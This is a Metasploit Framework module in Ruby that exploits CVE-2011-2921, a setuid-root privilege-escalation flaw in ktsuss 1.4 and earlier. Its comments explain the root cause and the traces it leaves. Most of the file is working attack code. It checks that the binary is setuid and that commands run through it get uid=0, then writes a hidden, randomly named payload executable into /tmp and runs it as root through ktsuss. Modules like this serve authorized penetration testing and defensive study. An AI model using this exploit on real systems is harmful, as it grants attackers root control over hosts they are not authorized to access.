GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
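# Local privilege-escalation module for CVE-2011-2921 (ktsuss <= 1.4).
#
# Root cause, as stated in the module description: the ktsuss binary is
# installed setuid root and does not drop privileges before running the
# command supplied by the user.
#
# What the code below does on the target, which is also what an
# investigator would look for:
#   * #check reports Safe unless KTSUSS_PATH exists and carries the setuid
#     bit, so a host without a setuid ktsuss is not affected.
#   * #check then runs `<ktsuss> -u <current user> id` and looks for `uid=0`.
#   * #exploit writes a dot-prefixed file with a random 10-15 character
#     alphanumeric name into WritableDir (default /tmp), marks it
#     executable, and starts it through ktsuss.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  # AutoCheck runs #check ahead of #exploit.
  prepend Msf::Exploit::Remote::AutoCheck

  # Registers module metadata and the two datastore options this module
  # reads (KTSUSS_PATH and WritableDir).
  #
  # @param info [Hash] metadata passed in by the framework and merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ktsuss suid Privilege Escalation',
        'Description' => %q{
          This module attempts to gain root privileges by exploiting
          a vulnerability in ktsuss versions 1.4 and prior.

          The ktsuss executable is setuid root and does not drop
          privileges prior to executing user specified commands,
          resulting in command execution with root privileges.

          This module has been tested successfully on:

          ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
          ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'John Lightsey', # Discovery and exploit
          'bcoles' # Metasploit
        ],
        'DisclosureDate' => '2011-08-13',
        'References' => [
          ['CVE', '2011-2921'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],
          ['URL', 'https://security.gentoo.org/glsa/201201-15'],
          ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']
        ],
        'Platform' => ['linux'],
        'Arch' => [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_RISCV64LE,
          ARCH_RISCV32LE,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
        'SessionTypes' => ['shell', 'meterpreter'],
        'Targets' => [['Auto', {}]],
        'DefaultOptions' => {
          'AppendExit' => true,
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependSetreuid' => true,
          'PrependSetuid' => true,
          'PrependFork' => true
        },
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ],
          # #exploit writes the payload executable into WritableDir (see
          # #upload), so the module does leave a file on disk until the
          # registered cleanup runs.
          'SideEffects' => [ ARTIFACTS_ON_DISK ]
        },
        'DefaultTarget' => 0
      )
    )
    register_options [
      # The description previously named "staprun", a leftover from another
      # module; this option points at the ktsuss binary.
      OptString.new('KTSUSS_PATH', [true, 'Path to ktsuss executable', '/usr/bin/ktsuss'])
    ]
    register_advanced_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  # @return [String] value of the KTSUSS_PATH option (default /usr/bin/ktsuss)
  def ktsuss_path
    datastore['KTSUSS_PATH']
  end

  # @return [String] value of the WritableDir option, coerced to a String
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Writes +data+ to +path+ on the target and registers the file for cleanup.
  #
  # Any existing file at +path+ is removed first (rm_f) before the write.
  #
  # @param path [String] destination path on the target
  # @param data [String] file contents
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  # Uploads +data+ to +path+ and then calls chmod on it.
  #
  # chmod is called without an explicit mode, so the mixin's default mode
  # applies.
  #
  # @param path [String] destination path on the target
  # @param data [String] file contents
  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  # Decides whether the target's ktsuss is affected.
  #
  # This is an active check: after confirming the binary exists and is
  # setuid, it executes `id` through ktsuss as the current user and treats
  # `uid=0` in the output as proof that privileges were not dropped.
  #
  # @return [CheckCode] Safe when the file is missing, not setuid, or the
  #   probe output lacks `uid=0`; Vulnerable otherwise
  def check
    return CheckCode::Safe("#{ktsuss_path} file not found") unless file? ktsuss_path
    return CheckCode::Safe("#{ktsuss_path} is not setuid") unless setuid? ktsuss_path

    vprint_good "#{ktsuss_path} is setuid"

    id = cmd_exec 'whoami'
    res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s
    vprint_status res

    unless res.include? 'uid=0'
      return CheckCode::Safe('ktsuss does not appear to be exploitable')
    end

    CheckCode::Vulnerable("ktsuss is exploitable")
  end

  # Uploads the generated payload executable and runs it through ktsuss.
  #
  # Fails with BadConfig when the session is already root (unless
  # ForceExploit is set) or when WritableDir is not writable.
  def exploit
    if !datastore['ForceExploit'] && is_root?
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # Dot-prefixed, randomly named file inside WritableDir.
    payload_name = ".#{rand_text_alphanumeric 10..15}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Executing payload ...'
    id = cmd_exec 'whoami'
    # The payload is backgrounded with `&`; the trailing `echo` presumably
    # lets cmd_exec return without waiting on it.
    res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo "
    vprint_line res
  end
end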